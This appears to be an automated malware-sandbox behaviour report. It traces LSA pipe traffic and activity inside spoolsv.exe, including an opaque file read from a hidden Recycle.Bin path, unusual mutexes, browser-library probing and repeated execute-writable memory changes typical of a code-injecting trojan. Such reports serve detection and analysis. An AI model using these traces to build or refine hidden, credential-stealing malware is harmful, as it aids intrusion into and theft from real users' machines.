Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2289221277
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2289221833
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2289222392
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2289223024
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2289224470
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2289225748
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2309703693
System info queried Type: ProcessInformation success or wait 2325043148
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2325080573
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2325084113
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4A 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2325087037
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2325088904
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9......u..%Z.E.\)|.&*..................................CF..w.tC..2............................ pending 2325094702
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,....................u..%Z.E.\)|.&*. pending 2325103115
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325229343
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325229780
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325231105
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2325238055
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2325238594
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2325239196
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325239912
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325241216
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2325290946
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2325291481
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2325292028
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2325292708
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2325294182
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2325295391
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2345499229
System info queried Type: ProcessInformation success or wait 2361231362
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2361318081
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2361321743
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4B 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2361324731
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2361326131
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.........,..O.....~^..................................CF..w.tC..2............................ pending 2361332252
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,.......................,..O.....~^. pending 2361338906
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361517087
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361517607
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361518963
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2361525918
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2361526445
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2361526959
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361527654
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361528890
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2361575508
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2361576254
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2361576960
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2361577716
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2361579397
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2361580717
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2381298675
System info queried Type: ProcessInformation success or wait 2397394972
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2397521018
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2397524735
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 90 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2397527812
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2397529642
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.....1r....QJ.n.O...J.................................CF..w.tC..2............................ pending 2397535681
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,...................1r....QJ.n.O...J pending 2397542081
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2397849253
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2397849805
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2397850330
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2397901209
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2397901753
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2397902297
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2397902913
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2397904688
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2397906060
Sections
+ General
Start time: 05:48:10
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k LocalService
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
Chronological sections
Operation Data Completion Time
+ Sections
+ General
Start time: 05:48:11
Start date: 01/12/2011
Path: C:\WINDOWS\system32\spoolsv.exe
Commandline: C:\WINDOWS\system32\spoolsv.exe
Imagebase: 0x1000000
File size: 58880 bytes
MD5 hash: 60784F891563FB1B767F70117FC2428F
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown A50000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E30000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E30000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E30000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E30000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E30000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 A406B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3416 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 A40639
3400 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
3404 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
3432 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
3428 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
13312 0s success or wait 189 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3416 1496 success or wait 0 A40279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1496 C:\WINDOWS\system32\spoolsv.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 A405EC
1496 C:\WINDOWS\system32\spoolsv.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1496 C:\WINDOWS\system32\spoolsv.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1496 C:\WINDOWS\system32\spoolsv.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
1496 C:\WINDOWS\system32\spoolsv.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
1496 C:\WINDOWS\system32\spoolsv.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
1496 C:\WINDOWS\system32\spoolsv.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
1496 C:\WINDOWS\system32\spoolsv.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1496 C:\WINDOWS\system32\spoolsv.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1496 C:\WINDOWS\system32\spoolsv.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
1496 C:\WINDOWS\system32\spoolsv.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
1496 C:\WINDOWS\system32\spoolsv.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1496 C:\WINDOWS\system32\spoolsv.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1496 C:\WINDOWS\system32\spoolsv.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1496 C:\WINDOWS\system32\spoolsv.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1496 C:\WINDOWS\system32\spoolsv.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1496 C:\WINDOWS\system32\spoolsv.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1496 C:\WINDOWS\system32\spoolsv.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2325927875
Thread created PID: 1496 TID: 3416 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2325947035
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2325948796
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2325967324
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: A50000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2325975025
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2325982500
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2325992047
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2326130135
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2326131717
Thread created PID: 1496 TID: 3400 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2326138235
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2326140697
Thread delayed Time: 0 TID: 13312 success or wait 2326140833
System info queried Type: BasicInformation success or wait 2326141166
System info queried Type: ProcessorInformation success or wait 2326141469
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326141876
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326146204
System info queried Type: BasicInformation success or wait 2326147035
System info queried Type: ProcessorInformation success or wait 2326147332
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326148617
